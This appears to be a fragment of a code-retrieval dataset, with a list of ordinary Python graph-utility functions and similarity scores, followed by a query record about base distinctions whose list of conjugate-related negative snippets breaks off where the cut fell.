"def test_unique_graph(self):\n g0_graph = tf.Graph()\n with g0_graph.as_default():\n tf.constant(1, name=\"a\")\n tf.constant(2, name=\"b\")\n g1_graph = tf.Graph()\n with g1_graph.as_default():\n tf.constant(1, name=\"a\")\n tf.constant(2, name=\"b\")\n\n g0 = gde.Graph(g0_graph.as_graph_def())\n g1 = gde.Graph(g1_graph.as_graph_def())\n a0, b0, a1, b1 = (g0[\"a\"], g0[\"b\"], g1[\"a\"], g1[\"b\"])\n\n print(\"g0['a'] returns {} (type {})\".format(g0['a'], type(g0['a'])))\n\n # Same graph, should be fine.\n self.assertIsNone(gde.util.check_graphs(a0, b0))\n # Two different graphs, should assert.\n with self.assertRaises(ValueError):\n gde.util.check_graphs(a0, b0, a1, b1)\n # a0 and b0 belongs to the same graph, should be fine.\n self.assertEqual(gde.util.get_unique_graph([a0, b0]), g0)\n # Different graph, should raise an error.\n with self.assertRaises(ValueError):\n gde.util.get_unique_graph([a0, b0, a1, b1])",
"def group_adjacents(group, board, filter_by=None):\n liberties = set([])\n for location in group:\n if filter_by == \"None\":\n liberties |= xy_adjacents(location, board, filter_by=\"None\")\n elif filter_by == \"friend\":\n liberties |= xy_adjacents(location, board, filter_by=\"friend\")\n elif filter_by == \"foe\":\n liberties |= xy_adjacents(location, board, filter_by=\"foe\")\n else:\n liberties |= xy_adjacents(location, board)\n liberties -= group\n return liberties",
"def split_into_components(X_df, G):\n components = list(networkx.components.connected_components(G))\n\n X_splits = [X_df.filter(items=component) for component in components]\n subgraphs = [G.subgraph(component) for component in components]\n return X_splits, subgraphs",
"def test_large_mostly_linear_graph_to_check_multiple_paths(self):\n self.assertEquals(\n Dijkstras().dijkstras(self.g8, 'a', 'b'),\n (5, ['a', 'c', 'd', 'b']))",
"def similar(g1, g2):\r\n return all(t1 == t2 for (t1, t2) in _squashed_graphs_triples(g1, g2))",
"def segmentGraph(self, edges):\r\n\r\n sorted_edges = sorted(edges)\r\n\r\n for i in range(self._num_edges):\r\n a = self._operation.find(sorted_edges[i][1])\r\n b = self._operation.find(sorted_edges[i][2])\r\n if a != b:\r\n if sorted_edges[i][0] <= self._thresh[a] and sorted_edges[i][0] <= self._thresh[b]:\r\n self._operation.join(a, b)\r\n a = self._operation.find(a)\r\n self._thresh[a] = sorted_edges[i][0] + self.threshold_fn(self._operation.size(a))\r\n\r\n for i in range(self._num_edges):\r\n a = self._operation.find(sorted_edges[i][1])\r\n b = self._operation.find(sorted_edges[i][2])\r\n\r\n if a != b and (self._operation.size(a) < self._minSize or self._operation.size(b) < self._minSize):\r\n self._operation.join(a, b)\r\n\r\n # num = self._operation.num_sets()\r\n # print(num)\r\n\r\n colors = []\r\n for i in range(self._num_vertices):\r\n b = np.random.randint(0, 256)\r\n g = np.random.randint(0, 256)\r\n r = np.random.randint(0, 256)\r\n colors.append([b, r, g])\r\n\r\n dim = self._image.shape\r\n dst = self._image.copy()\r\n\r\n for y in range(dim[0]):\r\n for x in range(dim[1]):\r\n temp = self._operation.find(y * dim[1] + x)\r\n dst[y, x] = colors[temp]\r\n\r\n plt.figure(2)\r\n plt.imshow(dst)\r\n plt.show()",
"def compress_graphs(graphs):\n \n verts = graphs.shape[1]\n graphs_comp = graphs.T[np.triu_indices(verts, 1)].T\n \n return graphs_comp",
"def containers(self):\n seen = set()\n return [l.from_segment for l in self.edges_to_containers \\\n if id(l) not in seen and not seen.add(id(l))]",
"def duplicate(self):\r\n graph = DistanceGraph(self.size)\r\n for node in self.edges:\r\n for edge in self.edges[node]:\r\n graph.edges[node][edge] = self.edges[node][edge]\r\n return graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def copy_graph(graph):\n new_graph = {}\n for node in graph:\n new_graph[node] = set(graph[node])\n return new_graph",
"def getSubGraphs(self):\n\n self.subGraphs = []\n visited = {}\n queue = deque()\n\n for s in self.nodes:\n\n if s not in visited:\n subGraph = SubGraph()\n self.subGraphs.append(subGraph)\n else:\n continue\n\n queue.append(s)\n\n while len (queue) > 0:\n outDegree = 0\n node = queue.popleft()\n if node in visited:\n continue\n\n for u in node.adj:\n if u not in visited:\n outDegree += 1\n queue.append(u)\n\n\n subGraph.addNode(node, outDegree)\n visited[node] = True",
"def test_random_node_disconnected_graphs(self):\n self.assertEquals(\n Dijkstras().dijkstras(self.g7, 'a', 'b'),\n (3, ['a', 'c', 'b']))",
"def compact_graph(f_segment_info, f_transition_info, f_each_segment_length, f_cut_index\\\r\n , b_segment_info, b_transition_info, b_each_segment_length, b_cut_index):\r\n hg = Graph(len(f_segment_info)+len(b_segment_info), len(f_transition_info)+len(b_transition_info))\r\n\r\n b_segment_info.reverse()\r\n b_current_segment_index = 0\r\n for s1 in b_segment_info:\r\n current_segment = Segment(b_current_segment_index,\\\r\n b_cut_index[b_current_segment_index]+1-b_each_segment_length[b_current_segment_index]\\\r\n , b_each_segment_length[b_current_segment_index], 0)\r\n current_segment.add_haplotype(b_segment_info[b_current_segment_index])\r\n hg.add_segment(current_segment)\r\n b_current_segment_index += 1\r\n\r\n f_current_segment_index = 0\r\n for s2 in f_segment_info:\r\n current_segment = Segment(f_current_segment_index+b_current_segment_index, f_cut_index[f_current_segment_index]\\\r\n , f_each_segment_length[f_current_segment_index], 1)\r\n current_segment.add_haplotype(f_segment_info[f_current_segment_index])\r\n hg.add_segment(current_segment)\r\n f_current_segment_index += 1\r\n\r\n b_transition_info.reverse()\r\n b_current_transition_index = 0\r\n for t1 in b_transition_info:\r\n current_transition = Transition(b_current_transition_index, b_cut_index[b_current_transition_index]+1, 0)\r\n current_transition.add_transition(b_transition_info[b_current_transition_index])\r\n hg.add_transition(current_transition)\r\n b_current_transition_index += 1\r\n\r\n f_current_transition_index = 0\r\n for t2 in f_transition_info:\r\n current_transition = Transition(f_current_transition_index+b_current_transition_index,\\\r\n f_cut_index[f_current_transition_index + 1], 1)\r\n current_transition.add_transition(f_transition_info[f_current_transition_index])\r\n hg.add_transition(current_transition)\r\n f_current_transition_index += 1\r\n\r\n return hg",
"def reduce_graph(G: Graph) -> Tuple[Graph, Graph]:\n G1 = Graph(G.V, set())\n G2 = Graph(G.V, set())\n # Note that the paper says |V1| != |V|, but it is likely a typo, and it meant\n # either \"until\" or \"while |V1| == |V|\"\n # After all, just looking at Figure 9 it is visible that the number of vertex\n # on G1 is not the number of vertex on the original graph\n while len(G1.V) == len(G.V):\n e = np.random.choice(list(G.E))\n S = generate_clique_candidate(G, e)\n G1 = induced_subgraph(G, S)\n G2.E = G.E.difference({e})\n return G1, G2",
"def get_locations(nodes, tl, br):\n \n # Base cases:\n if len(nodes) == 1: # for singleton, only choice is to place in the single spot in 1x1 square\n return {nodes[0]: tl}\n if len(nodes) == 2: # for two nodes, arbitrarily chose to place the first node in top left\n return {nodes[0]: tl, nodes[1]: br}\n\n # Recursive case, need to create and solve subproblems:\n ret = {}\n\n num_edges = count_num_edges(nodes)\n if num_edges == 0: # for empty graphs, no need to run METIS, just assign arbitrarily\n i = 0\n for x in range(tl.x, br.x+1): \n for y in range(tl.y, br.y+1):\n if i < len(nodes):\n ret.update({nodes[i]: Point(x,y)})\n i += 1\n return ret\n\n filename = splitext(basename(sys.argv[1]))[0] + '.p.' + sys.argv[2] + '.yx.' + sys.argv[3] + '.drop.' + sys.argv[4] + '.' +\\\n '_'.join(['delete', str(tl.x), str(tl.y), str(br.x), str(br.y)]) \n\n # special case for the very first call of get_locations. For example, suppose that there are\n # 97 nodes on a 10x10 grid. Instead of dividing the 97 nodes into 2 equal partitions, we should\n # divide them into a partition of 90 nodes and a partition of 7 nodes. The former should be\n # placed on a 10x9 grid and te latter should be placed on a 1x7 grid.\n if len(nodes) < (br.x - tl.x + 1) * (br.y - tl.y + 1):\n assert tl == Point(0, 0)\n size_tl_nodes = (br.x + 1) * int(len(nodes) / (br.x + 1))\n if size_tl_nodes == len(nodes):\n ret.update(get_locations(nodes, tl=Point(0, 0), br=Point(br.x, len(nodes) / (br.x + 1) - 1)))\n return ret\n\n nodes_tl, nodes_br = partition(nodes, size_tl_nodes, filename)\n # complicated indexing here. As an example, for the 97 into 10x10 case, we want to send 90 nodes\n # to a rectangle spanned by tl=Point(0, 0) and br=Point(9, 8) and we want to send 7 nodes to a \n # rectangle spanned by tl=Point(0, 9) and br=Point(6, 9)\n ret.update(get_locations(nodes_tl, tl=Point(0, 0), br=Point(br.x, len(nodes) / (br.x + 1) - 1)))\n ret.update(get_locations(nodes_br, tl=Point(0, len(nodes) / (br.x + 1)), br=Point(len(nodes) % (br.x + 1) - 1, len(nodes) / (br.x + 1))))\n return ret\n\n if br.x - tl.x > br.y - tl.y: # if rectangle is wider than tall, split on y axis\n half = tl.x + (br.x - tl.x - 1) / 2\n size_tl_nodes = (half - tl.x + 1) * (br.y - tl.y + 1)\n else: # split on x axis\n half = tl.y + (br.y - tl.y - 1) / 2\n size_tl_nodes = (br.x - tl.x + 1) * (half - tl.y + 1)\n\n nodes_tl, nodes_br = partition(nodes, size_tl_nodes, filename)\n\n if br.x - tl.x > br.y - tl.y: # if rectangle is wider than tall, split on y axis\n ret.update(get_locations(nodes_tl, tl=tl, br=Point(half, br.y)))\n ret.update(get_locations(nodes_br, tl=Point(half + 1,tl.y), br=br))\n else: # split on x axis\n ret.update(get_locations(nodes_tl, tl=tl, br=Point(br.x, half)))\n ret.update(get_locations(nodes_br, tl=Point(tl.x, half + 1), br=br))\n\n return ret",
"def infer_reuse_pattern(fgraph, outputs_to_disown):\r\n rval = set()\r\n for o in outputs_to_disown:\r\n view_tree_set(alias_root(o), rval)\r\n # remove from rval all of the inputs, constants, values.\r\n rval = set(r for r in rval if r.owner is not None)\r\n\r\n return rval",
"def graph_generation(nodes: np.ndarray, edges: np.ndarray):\n result_nodes = []\n result_edges = []\n\n last_index = nodes[-1, 0]\n\n done = False\n # print(nodes)\n for p in range(nodes.shape[0]):\n for q in range(nodes.shape[0]):\n if list(nodes[p, 1:-2]) == (list(nodes[q, 1:-2])) and nodes[p, nodes.shape[1] - 2] < \\\n nodes[q, nodes.shape[1] - 2]:\n tmp_node = np.append(nodes[p, 1:], np.append(nodes[q, nodes.shape[1] - 2],\n np.append(nodes[q, nodes.shape[1] - 1],\n np.append(nodes[p, 0],\n nodes[q, 0]))))\n if not done:\n result_nodes = [tmp_node]\n done = True\n else:\n result_nodes = np.concatenate((result_nodes, [tmp_node]))\n\n result_nodes = result_nodes[np.argsort(\n result_nodes[:, [e for e in range(1, result_nodes.shape[1] - 2) if e % 2 != 0]].sum(axis=1)), :]\n\n result_nodes = np.c_[range(last_index + 1, last_index + 1 + result_nodes.shape[0]), result_nodes]\n # print(result_nodes)\n\n done = False\n for e in range(edges.shape[0]):\n for f in range(edges.shape[0]):\n for p in range(result_nodes.shape[0]):\n for q in range(result_nodes.shape[0]):\n if (edges[e, 0] == result_nodes[p, -2] and edges[e, 1] == result_nodes[q, -2] and edges[\n f, 0] == result_nodes[p, -1] and edges[f, 1] == result_nodes[q, -1]) \\\n or (edges[e, 0] == result_nodes[p, -2] and edges[e, 1] == result_nodes[q, -2] and\n result_nodes[p, -1] == result_nodes[q, -1]) \\\n or (edges[e, 0] == result_nodes[p, -1] and edges[e, 1] == result_nodes[q, -1] and\n result_nodes[p, -2] == result_nodes[q, -2]):\n if not done:\n result_edges = [[result_nodes[p, 0], result_nodes[q, 0]]]\n done = True\n else:\n result_edges = np.concatenate(\n (result_edges, [[result_nodes[p, 0], result_nodes[q, 0]]]), axis=0)\n # print(edges)\n\n # print(result_edges)\n unique_result_edges = list(Counter(str(e) for e in result_edges).keys())\n # print(unique_result_edges)\n final_edges = []\n for k in range(len(unique_result_edges)):\n for j in range(result_edges.shape[0]):\n if str(result_edges[j]) == unique_result_edges[k]:\n if k == 0:\n final_edges = result_edges[j]\n break\n else:\n final_edges = np.concatenate((final_edges, result_edges[j]))\n break\n final_edges = np.reshape(final_edges, (int(final_edges.shape[0] / 2), 2))\n # print(final_edges.shape[0])\n done = False\n edge_to_remove = []\n for j in range(final_edges.shape[0]):\n for k in range(j + 1, final_edges.shape[0]):\n if final_edges[j, 1] == final_edges[k, 0]:\n if not done:\n edge_to_remove = [[final_edges[j, 0], final_edges[k, 1]]]\n done = True\n else:\n edge_to_remove = np.concatenate((edge_to_remove, [[final_edges[j, 0], final_edges[k, 1]]]))\n # print(edge_to_remove)\n\n idx_to_remove = []\n done = False\n for j in range(edge_to_remove.shape[0]):\n for k in range(final_edges.shape[0]):\n if list(edge_to_remove[j]) == list(final_edges[k]):\n if not done:\n idx_to_remove = k\n done = True\n else:\n idx_to_remove = np.append(idx_to_remove, k)\n final_edges = np.delete(final_edges, idx_to_remove, axis=0)\n # print(final_edges)\n result_nodes = np.delete(result_nodes, [-1, -2], 1)\n # print(result_nodes)\n return result_nodes, final_edges",
"def build_drop_fullgraphs(self, do_subgraph=False, graph_lib='pygraphviz'):\n if 'pygraphviz' == graph_lib:\n G = pgv.AGraph(strict=True, directed=True)\n else:\n G = nx.Graph()\n do_subgraph = False\n subgraph_dict = defaultdict(list) # k - node-ip, v - a list of graph nodes\n oid_gnid_dict = dict()\n\n for i, oid in enumerate(self.pg_spec.keys()):\n oid_gnid_dict[oid] = str(i)\n logger.info(\"oid to gid mapping done\")\n\n for dropspec in self.pg_spec.itervalues():\n gid = oid_gnid_dict[dropspec['oid']]\n ip = dropspec['node']\n subgraph_dict[ip].append(gid)\n if (dropspec['type'] == 'app'):\n G.add_node(gid, shape='rect', label='')#, fixedsize=True, hight=.05, width=.05)\n elif (dropspec['type'] == 'plain'): #parallelogram\n G.add_node(gid, shape='circle', label='')#, fixedsize=True, hight=.05, width=.05)\n logger.info(\"Graph nodes added\")\n\n for dropspec in self.pg_spec.itervalues():\n gid = oid_gnid_dict[dropspec['oid']]\n if (dropspec['type'] == 'app'):\n ds_kw = 'outputs' #down stream key word\n elif (dropspec['type'] == 'plain'):\n ds_kw = 'consumers'\n else:\n ds_kw = 'None'\n if (ds_kw in dropspec):\n for doid in dropspec[ds_kw]:\n G.add_edge(gid, oid_gnid_dict[doid])\n logger.info(\"Graph edges added\")\n\n if (do_subgraph):\n for i, subgraph_nodes in enumerate(subgraph_dict.values()):\n # we don't care about the subgraph label or rank\n subgraph = G.add_subgraph(subgraph_nodes, label='%d' % i, name=\"cluster_%d\" % i, rank=\"same\")\n subgraph.graph_attr['rank']='same'\n logger.info(\"Subgraph added\")\n\n return G",
"def graph_issubset(graph1, graph2):\n\n # Validate if all arguments are Graphs\n check_graphbase_instance(graph1, graph2)\n\n return graph1.nodes.issubset(graph2.nodes) and graph1.edges.issubset(graph2.edges)",
"def contained(self):\n seen = set()\n return [l.to_segment for l in self.edges_to_contained \\\n if id(l) not in seen and not seen.add(id(l))]",
"def doffsets(self):\n self._flatten()\n for n in self.seq[1:len(self.seq)-1]:\n yield sorted([ d['idx'] - n['idx'] for d in n['edges'] ])\n return",
"def get_inconsistent_edges(graph: BELGraph) -> Iterable[Tuple[BaseEntity]]:\n for u, v in graph.edges():\n if not pair_is_consistent(graph, u, v):\n yield u, v",
"def _adjacency(areal_units):\n\n ## Compute adjacency list\n ## Units adjacent if they share a border (line)\n adjacency = {a:[] for a in areal_units}\n for a0,a1 in itertools.permutations(areal_units, 2):\n if (areal_units[a0].intersection(areal_units[a1])).geom_type == 'LineString': \n adjacency[a0].append(a1)\n adjacency[a1].append(a0)\n\n return adjacency",
"def edges(self) -> Set[Tuple[int, int]] : \n edges : Set[Tuple[int, int]] = set()\n for node_id in self.nodes: # iterator over id's\n for adj_node in self.nodes[node_id]:\n edge = (node_id, adj_node)\n if self.directed:\n edges.add(edge)\n else:\n if edge[::-1] not in edges: # if reverse edge not in edges...\n edges.add(edge)\n return edges",
"def dominance_frontiers(G, start):\n idom = nx.immediate_dominators(G, start)\n\n df = {u: set() for u in idom}\n for u in idom:\n if len(G.pred[u]) >= 2:\n for v in G.pred[u]:\n if v in idom:\n while v != idom[u]:\n df[v].add(u)\n v = idom[v]\n return df",
"def compare(self):\n len0 = len(self.cluster_lists[0])\n len1 = len(self.cluster_lists[1])\n longer_index = 0 if len0 >= len1 else 1\n shorter_index = 1 if len1 <= len0 else 0\n self.stars_length = len(self.cluster_lists[shorter_index]) \n self.starlets_length = len(self.cluster_lists[longer_index]) \n # build the noeds for shorter cluster list, and get the\n # distribution of cluster size.\n for cluster in self.cluster_lists[shorter_index]:\n len_spectra = len(cluster.get_spectra())\n star = ClusterNode(cluster.id, len_spectra) \n self.stars[cluster.id] = star\n\n self.cluster_spectra_num[shorter_index] += len_spectra\n self.cluster_size_dist[shorter_index][len_spectra] = self.cluster_size_dist[shorter_index].get(len_spectra,0) + 1\n # build the noeds for longer cluster list, and get the\n # distribution of cluster size.\n for cluster in self.cluster_lists[longer_index]:\n len_spectra = len(cluster.get_spectra())\n starlet = ClusterNode(cluster.id, len_spectra) \n self.starlets[cluster.id] = starlet\n\n self.cluster_spectra_num[longer_index] += len_spectra\n self.cluster_size_dist[longer_index][len_spectra] = self.cluster_size_dist[longer_index].get(len_spectra,0) + 1\n # do the comparing, and network building\n for i in range (0, len(self.cluster_lists[shorter_index])):\n cluster0 = self.cluster_lists[shorter_index][i] \n for j in range (i, len(self.cluster_lists[longer_index])):\n cluster1 = self.cluster_lists[longer_index][j] \n (shared_spec_num, similarity) = self.calculate_similarity(cluster0, cluster1)\n if similarity == 0:\n continue\n self.similarity_dist[int(similarity*10)] = self.similarity_dist.get(int(similarity*10),0) + 1\n self.shared_spec_num += shared_spec_num\n\n self.stars[cluster0.id].add_nb_node(cluster1.id, similarity, shared_spec_num)\n self.starlets[cluster1.id].add_nb_node(cluster0.id, similarity, shared_spec_num)\n\n self.ave_star_size = self.cluster_spectra_num[shorter_index]/self.stars_length\n self.ave_starlet_size = self.cluster_spectra_num[longer_index]/self.starlets_length",
"def _get_full_graph(self):",
"def get_dominant_graph(msm, with_comm_classes=False):\n\n g = AGraph(strict=False, directed=True)\n\n g.graph_attr.update(size=\"7.75, 10.25\")\n g.graph_attr.update(dpi=\"300\")\n for i in range(msm.num_nodes):\n if(i in msm.a):\n g.add_node(i, color = 'blue')\n elif(i in msm.b):\n g.add_node(i, color = 'green')\n elif(i in msm.dominant_pathway):\n g.add_node(i, color= 'red')\n else:\n g.add_node(i)\n\n if with_comm_classes:\n comm_classes = msm.communication_classes\n\n for (i, comm) in enumerate(comm_classes):\n g.add_subgraph(nbunch=comm, name='cluster%d' % i,\n style='rounded, dotted',\n color='lightgrey',\n label='<<B>Communication class %d</B>>' % (i + 1))\n\n for from_node in range(msm.num_nodes):\n for to_node in get_adjacent_nodes(msm, from_node, discard_self=False):\n if msm.effective_probability_current[from_node, to_node] != 0.0:\n label = '%.2E' % msm.effective_probability_current[from_node, to_node]\n if([from_node, to_node] in msm.dominant_pathway_format):\n g.add_edge(from_node, to_node, color='red' , label=label)\n else:\n \tg.add_edge(from_node, to_node, label=label)\n\n return g",
"def make_set(g, nodes):\n s = Set()\n names = nodes['names']\n for ii,name in enumerate(names):\n \"\"\" \n We will assume node is entirely contained\n in group if they have one atom in common\n \"\"\" \n atoms = mdn.dic2list(nodes[name]['atoms'])\n atom0 = atoms[0]\n if (atom0 in mdn.dic2list(g['atoms'])):\n s.add(ii)\n return s",
"def split_network(self):\n disconnect_nodes(self.nodes[1], 2)\n disconnect_nodes(self.nodes[2], 1)\n self.sync_all([self.nodes[:2], self.nodes[2:]])",
"def __init__(self):\n # set of lists of nodal differences\n self.di = {}\n # self of upper boudns\n self.i = {}",
"def filter_graph(self, sorted_node, ploidy):\n \n for node in sorted_node:\n \n # while number of prefix edge > ploidy level\n while len(self.prefix[node]) > ploidy:\n min_weight_node = min(self.prefix[node], key=self.prefix[node].get)\n self.remove_edge(min_weight_node, node)\n \n # while number of suffix edge > ploidy level\n while len(self.suffix[node]) > ploidy:\n min_weight_node = min(self.suffix[node], key=self.suffix[node].get)\n self.remove_edge(node, min_weight_node)\n \n print(\"Graph is reduced to best overlap graph.\")",
"def make_complete_graph(num_nodes):\r\n result = {}\r\n for idx in range(0,num_nodes):\r\n result[idx] = set([])\r\n for jdx in range(0,num_nodes):\r\n if (idx!=jdx):\r\n result[idx].add(jdx)\r\n return result",
"def createBridgeSets(blocksize,operating,MPSS):\n sets = tuple()\n xul = blocksize[0]-operating\n xdl = operating\n yul = int(blocksize[0]/2+operating)\n ydl = int(blocksize[0]/2-operating)\n xts = xul\n xbs = xdl\n for i in range(MPSS):\n sets+=(tuple(product(numpy.arange(xdl,xul,1),numpy.arange(ydl,yul,1))),)\n xdl+=operating\n xul-=operating\n ydl-=operating\n yul+=operating\n return sets,sets[::-1]",
"def buildConnectedSets(self, cars):",
"def split_at_nodes(shp):\n nodes = find_nodes(shp)\n nodeIds = list(nodes)\n nodeIds.sort()\n nodeIds = dict([(node,i) for i,node in enumerate(nodeIds)])\n \n for road in shp:\n vrts = road.vertices\n midVrts = set(road.vertices[1:-1]) #we know end points are nodes\n midNodes = midVrts.intersection(nodes) # find any nodes in the middle of the feature.\n midIdx = [vrts.index(node) for node in midNodes] # Get their indices\n midIdx.sort()\n if midIdx:\n #print vrts\n starts = [0]+midIdx\n stops = [x+1 for x in midIdx]+[None]\n for start,stop in zip(starts,stops):\n feat = pysal.cg.Chain(vrts[start:stop])\n rec = (nodeIds[feat.vertices[0]],nodeIds[feat.vertices[-1]],False)\n yield feat,rec\n else:\n rec = (nodeIds[road.vertices[0]],nodeIds[road.vertices[-1]],False)\n yield road,rec",
"def graph_issuperset(graph1, graph2):\n\n # Validate if all arguments are Graphs\n check_graphbase_instance(graph1, graph2)\n\n return graph1.nodes.issuperset(graph2.nodes) and graph1.edges.issuperset(graph2.edges)",
"def find_boundary(edges):\n\n inputs = set([x[0] for x in edges])\n outputs = set([x[1] for x in edges])\n for e in edges:\n inputs.discard(e[1])\n outputs.discard(e[0])\n return inputs, outputs",
"def direct_comparability_graph_to_hase_diagram(direct_comparability):\n\n hase_diagram = DirectedGraph.from_graph(direct_comparability)\n\n hase_diagram.difference(((x, x) for x in direct_comparability))\n\n for x, y in direct_comparability.edges:\n if direct_comparability(x).intersection(direct_comparability(y, begin=False, end=True)):\n hase_diagram.difference([(x, y)])\n continue\n return hase_diagram",
"def sage_graph(self):\n self.fe.load_cache()\n edges = []\n is_bipartite = self.variant.is_bipartite()\n for X in self.L:\n for Y in self.L:\n a = self.op_norm(X, Y)\n if not self.K.is_zero(a):\n for c in self.K.unit_group:\n d = a - c\n if X != Y or c < d or is_bipartite:\n edges.append(((X, c, False), (Y, d, is_bipartite)))\n if X == Y and not is_bipartite:\n break\n return sage.all.Graph(edges)",
"def get_all_pairs(G):\n # list all (start,dest) pairs between which the route must be computed\n pairs_list = [(start, dest) for dest in G.nodes for start in G.nodes]\n\n # shuffle all elements in-place\n random.shuffle(pairs_list)\n\n # generate a set from the list\n pairs_set = set(pairs_list)\n\n return pairs_list, pairs_set"
] | [
"0.6665472",
"0.6266713",
"0.60041565",
"0.5954314",
"0.5943517",
"0.57617503",
"0.56672305",
"0.55829006",
"0.55741566",
"0.5567686",
"0.555246",
"0.5516986",
"0.5512369",
"0.5498665",
"0.54714924",
"0.54479235",
"0.5445841",
"0.54253536",
"0.5403769",
"0.53954047",
"0.5389636",
"0.53824466",
"0.537892",
"0.5357041",
"0.5347916",
"0.5346679",
"0.53353524",
"0.5330936",
"0.5330201",
"0.53229165",
"0.53066695",
"0.5289265",
"0.5280843",
"0.52656573",
"0.5262725",
"0.5259474",
"0.5249874",
"0.5248919",
"0.5243522",
"0.52245885",
"0.52162945",
"0.5209969",
"0.52040476",
"0.52031755",
"0.51924694",
"0.51857835",
"0.51770854",
"0.5174891",
"0.5174891",
"0.5174612",
"0.5171182",
"0.51706445",
"0.5169918",
"0.516673",
"0.51646596",
"0.51619774",
"0.51612425",
"0.5159246",
"0.5140481",
"0.5132481",
"0.51279855",
"0.51265496",
"0.5125759",
"0.51149136",
"0.5114361",
"0.5114361",
"0.5114361",
"0.5114361",
"0.5114361",
"0.51062745",
"0.5101469",
"0.50815475",
"0.5070339",
"0.50637287",
"0.5061575",
"0.5058457",
"0.50573945",
"0.5057391",
"0.505438",
"0.50537384",
"0.5052835",
"0.50504315",
"0.5037462",
"0.5036322",
"0.50269985",
"0.5025969",
"0.5021922",
"0.50207824",
"0.50177324",
"0.50115174",
"0.50073946",
"0.50037575",
"0.4994415",
"0.49932852",
"0.49910322",
"0.49891576",
"0.49890512",
"0.49853975",
"0.49843714",
"0.49834153"
] | 0.58428085 | 5 |
For conjugate distinctions this should be overridden and return the base distinctions used. For non-conjugate distinctions it will automatically return an empty list. | def getBaseDistinctions(self):
return [] | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_conjugate_bases_of(chebi_ent):\n if hasattr(chebi_ent, 'OntologyParents'):\n return [ent.chebiId for ent in chebi_ent.OntologyParents if\n (ent.type == \"is conjugate base of\")]\n else:\n return []",
"def conjugate(self):\n pass",
"def conjugate(self, ???):",
"def conjugate(self):\n v = zeros_como(self)\n for x in range(self.n):\n v[x] = (self[x]).conjugate()\n\n return v",
"def conjugate(self):\r\n return self.__class__(self._real, -self._imag)",
"def conjugate(self):\n return self.rotate().dagger()",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def base(self):\n if self._base == []:\n self.schreier_sims()\n return self._base",
"def conjugate(self) -> JaggedArray:\n return self._unitary_op(np.conjugate)",
"def conjugate_irregular_tenses(self):\n conjugations = [ None ] * len(Tense)\n def __look_for_overrides(verb): \n overrides = [ override_attribute.key for override_attribute in ConjugationOverrideProperty.all_except(ConjugationOverrideProperty.conjugation_joins) if hasattr(verb, override_attribute.key)]\n if len(overrides) == 0:\n return None\n \n for attr_name in overrides:\n for tense in range(len(Tense)):\n override = getattr(verb, attr_name)\n if override[tense] is None:\n continue\n \n if tense in Tense.Person_Agnostic():\n if conjugations[tense] is None:\n conjugations[tense] = self.verb_for_derived.conjugate_tense(tense)\n else:\n for person in range(len(Person)):\n if override[tense][person] is not None:\n if conjugations[tense] is None:\n conjugations[tense] = [ None ] * len(Person)\n if conjugations[tense][person] is None:\n conjugations[tense][person] = self.verb_for_derived.conjugate(tense, person)\n __look_for_overrides(self)\n if self.base_verb is not None:\n __look_for_overrides(self.base_verb)\n return conjugations",
"def conjugate(self, x):\n\n a = self.array_form\n b = x.array_form\n n = len(a)\n if len(b) != n:\n raise ValueError(\"The number of elements in the permutations \\\ndon\\'t match.\")\n invb = [None]*n\n for i in xrange(n):\n invb[b[i]] = i\n return _new_from_array_form([invb[a[i]] for i in b])",
"def get_base_coefs(mv):\n\trs = []\n\tfor bs in bases:\n\t\tt = []\n\t\tfor b in bs:\n\t\t\tt.append(mv.coef(b))\n\t\t\t\t\t\n\t\trs.append(t)\t\t\n\treturn rs",
"def conjugate(self):\n return self.__class__(scalar=self.scalar, vector= -self.vector)",
"def conjugate(self) -> 'MultiVector':\n\n return (~self).gradeInvol()",
"def conjugate(self):\n return Complex(self._reNum, -self._imNum)",
"def conjugate(self):\n parts = list(self)\n # Destroy the diagram column by column, adding each column\n # to the new partition\n eat_diagram = [\n [x - k for x in parts if x - k > 0] for k in range(parts[0])]\n conj_part = [len(y) for y in eat_diagram]\n B = BosonicPartitions()\n return B(conj_part)",
"def get_conjugated_nodes(self):\n sets = []\n self.get_backbone()\n m = self.mbb\n for bi in m.GetBonds():\n #print ' -- idx = ', bi.GetIdx()\n n = len(sets)\n iconj = bi.GetIsConjugated()\n ins = ( bt2bo[ bi.GetBondType() ] > 1 ) # is non-single bond?\n if iconj or ins:\n ia1, ia2 = bi.GetBeginAtomIdx(), bi.GetEndAtomIdx()\n set_i = set([ia1, ia2])\n if n == 0:\n sets.append( set_i )\n else:\n for j, set_j in enumerate(sets):\n if set_i.intersection( set_j ) > set([]):\n sets[j].update( set_i )\n else:\n if set_i not in sets: sets.append( set_i )\n #print '-- sets = ', sets\n sets_u = cim.merge_sets(sets)\n return sets_u",
"def concentration(self):\n return [node.concentration for node in self]",
"def omega(self):\n return [coset for coset in range(len(self.p)) if self.p[coset] == coset]",
"def conjugate(self) -> np.ndarray:\n if self.scalar_vector:\n return self.array*np.array([1.0, -1.0, -1.0, -1.0])\n return self.array*np.array([-1.0, -1.0, -1.0, 1.0])",
